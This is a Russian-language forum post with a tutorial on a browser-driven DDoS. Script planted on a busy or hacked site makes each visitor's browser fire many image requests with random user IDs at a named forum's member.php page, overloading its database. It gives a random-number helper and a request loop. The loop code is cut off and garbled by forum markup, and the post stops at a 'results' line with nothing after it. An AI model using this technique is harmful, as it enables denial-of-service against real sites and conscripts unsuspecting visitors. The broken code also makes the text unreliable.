Неосознанная DDoS-атака
Писать много не буду, сразу перейдем ближе к делу. Писать буду про атаку на JS.
Вот к примеру у вас есть сайт с трафиком или же там шелл с приличным трафиком, но вы не можете придумать, что с ним сделать (либо знаний нет, либо он забугорный, ок). Его можно использовать под ддос, то бишь, юзверь заходит на сайт и невольное атакует сайт, который вы хотите, ок.
Рассмотрим на примере атаку на форум ламеров worldofplayers.ru. Заходим на сайт и ищем ссылки с передаваемыми параметрами в БД, пусть это будет вывод данных про юзверей: oldforum.worldofplayers.ru/member.php
?u=
Теперь ближе к сути, пользователь заходит на сайт где установлен скрипт для атаки, скрипт генерирует случайные числа, подставляет их в ссылку и выводит это как изображение, причем выводит не 1 раз, а N-число раз, что сильно нагрузит работу БД и PHP-демона, так-как выводятся все изображения буквально за 1 раз, а на атакуемом сайте производится масса запросов к БД. Теперь перейдем к написанию самого скрипта.
1) Делаем функцию для рандомного выбора числа
code:
function rand(min, max){
min = parseInt(min);
max = parseInt(max);
return Math.floor(Math.random()*(max-min+1))+min;
}
2) Делаем вывод изображения с определенным диапазоном чисел
code:
[LEFT]for(var i=0;i[/B].
После проделанных выше процедур у нас должно получиться, что-то типа такого:
code:
function rand(min, max){
min = parseInt(min);
max = parseInt(max);
return Math.floor( Math.random() * (max - min + 1) ) + min;
}
for(var i=0;i
И так, наш скрипт готов, теперь запихиваем его в любое место страницы нашего сайта/шелла/etc и ждем результата.
Практика дала результаты: